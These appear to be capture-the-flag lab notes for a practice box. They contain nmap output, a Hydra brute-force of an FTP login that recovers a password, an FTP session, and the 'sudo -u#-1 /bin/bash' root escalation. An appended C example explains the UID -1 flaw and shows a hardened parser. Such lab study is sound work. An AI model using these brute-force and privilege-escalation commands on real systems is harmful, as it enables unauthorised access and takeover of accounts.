nmap -sC -sV -oN nmap 10.10.84.161 -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-05 09:23 PST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:23
Completed NSE at 09:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:23
Completed NSE at 09:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:23
Completed NSE at 09:23, 0.00s elapsed
Initiating Ping Scan at 09:23
Scanning 10.10.84.161 [2 ports]
Completed Ping Scan at 09:23, 0.28s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:23
Completed Parallel DNS resolution of 1 host. at 09:23, 1.18s elapsed
Initiating Connect Scan at 09:23
Scanning 10.10.84.161 [1000 ports]
Discovered open port 21/tcp on 10.10.84.161
Discovered open port 80/tcp on 10.10.84.161
Discovered open port 22/tcp on 10.10.84.161
Increasing send delay for 10.10.84.161 from 0 to 5 due to max_successful_tryno increase to 4
Completed Connect Scan at 09:24, 21.51s elapsed (1000 total ports)
Initiating Service scan at 09:24
Scanning 3 services on 10.10.84.161
Completed Service scan at 09:24, 6.65s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.84.161.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 10.29s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 2.21s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
Nmap scan report for 10.10.84.161
Host is up, received syn-ack (0.28s latency).
Scanned at 2024-01-05 09:23:38 PST for 41s
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef1f5d04d47795066072ecf058f2cc07 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5hdrxDB30IcSGobuBxhwKJ8g+DJcUO5xzoaZP/vJBtWoSf4nWDqaqlJdEF0Vu7Sw7i0R3aHRKGc5mKmjRuhSEtuKKjKdZqzL3xNTI2cItmyKsMgZz+lbMnc3DouIHqlh748nQknD/28+RXREsNtQZtd0VmBZcY1TD0U4XJXPiwleilnsbwWA7pg26cAv9B7CcaqvMgldjSTdkT1QNgrx51g4IFxtMIFGeJDh2oJkfPcX6KDcYo6c9W1l+SCSivAQsJ1dXgA2bLFkG/wPaJaBgCzb8IOZOfxQjnIqBdUNFQPlwshX/nq26BMhNGKMENXJUpvUTshoJ/rFGgZ9Nj31r
| 256 5e02d19ac4e7430662c19e25848ae7ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHdSVnnzMMv6VBLmga/Wpb94C9M2nOXyu36FCwzHtLB4S4lGXa2LzB5jqnAQa0ihI6IDtQUimgvooZCLNl6ob68=
| 256 2d005cb9fda8c8d880e3924f8b4f18e2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Annoucement
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 09:24
Completed NSE at 09:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.49 seconds
curl -A "C" -L 10.10.84.161
Attention chris, <br><br>
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>
From,<br>
Agent R
hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.92.72
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-05 10:45:28
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.92.72:21/
[STATUS] 159.00 tries/min, 159 tries in 00:01h, 14344240 to do in 1503:36h, 16 active
[21][ftp] host: 10.10.92.72 login: chris password: crystal
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-05 10:47:14
ftp -p 10.10.92.72
Connected to 10.10.92.72.
220 (vsFTPd 3.0.3)
Name (10.10.92.72:kyou): chris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (10,10,92,72,51,30).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.
sudo -u#-1 /bin/bash
Description:
Sudo doesn't check for the existence of the specified user ID and executes the command with an arbitrary user ID, with sudo privileges.
-u#-1 returns as 0, which is root's ID.
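Why -1 ends up as root, as an added example (not part of the original notes and not sudo's own source): sudo is installed setuid root, and setreuid() treats (uid_t)-1 as "leave this ID unchanged", so an ID parser that lets -1 or 4294967295 through keeps the command at UID 0. The function names are illustrative, and the hardened parser is one way to refuse the value, assuming a 32-bit uid_t as on Linux.

```c
/* Added example: "-u#-1" wraps to (uid_t)-1; a hardened parser refuses it. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Naive parse: any integer is accepted and cast to uid_t, so "-1" wraps. */
uid_t parse_uid_naive(const char *s)
{
    return (uid_t)strtoll(s, NULL, 10);
}

/* Hardened parse (illustrative): digits only, and never the reserved (uid_t)-1.
 * Returns 0 and stores the ID on success, -1 on rejection. */
int parse_uid_hardened(const char *s, uid_t *out)
{
    char *end;
    long long v;

    if (s == NULL || *s < '0' || *s > '9')
        return -1;                       /* rejects "", "-1", "+1", " 1" */
    errno = 0;
    v = strtoll(s, &end, 10);
    if (errno != 0 || *end != '\0')
        return -1;                       /* overflow or trailing junk */
    if (v >= (long long)(uid_t)-1)
        return -1;                       /* 4294967295 is the "no change" value */
    *out = (uid_t)v;
    return 0;
}

/* setreuid() treats (uid_t)-1 as "leave this ID unchanged": the call succeeds
 * and the process keeps whatever IDs it already had. Returns 1 if that holds. */
int minus_one_keeps_ids(void)
{
    uid_t r = getuid(), e = geteuid();
    if (setreuid((uid_t)-1, (uid_t)-1) != 0)
        return 0;
    return getuid() == r && geteuid() == e;
}

int main(void)
{
    uid_t u;
    printf("naive(\"-1\") = %lu\n", (unsigned long)parse_uid_naive("-1"));
    printf("hardened(\"-1\") = %d\n", parse_uid_hardened("-1", &u));
    printf("hardened(\"1000\") = %d\n", parse_uid_hardened("1000", &u));
    printf("setreuid(-1,-1) keeps IDs: %d\n", minus_one_keeps_ids());
    return 0;
}
```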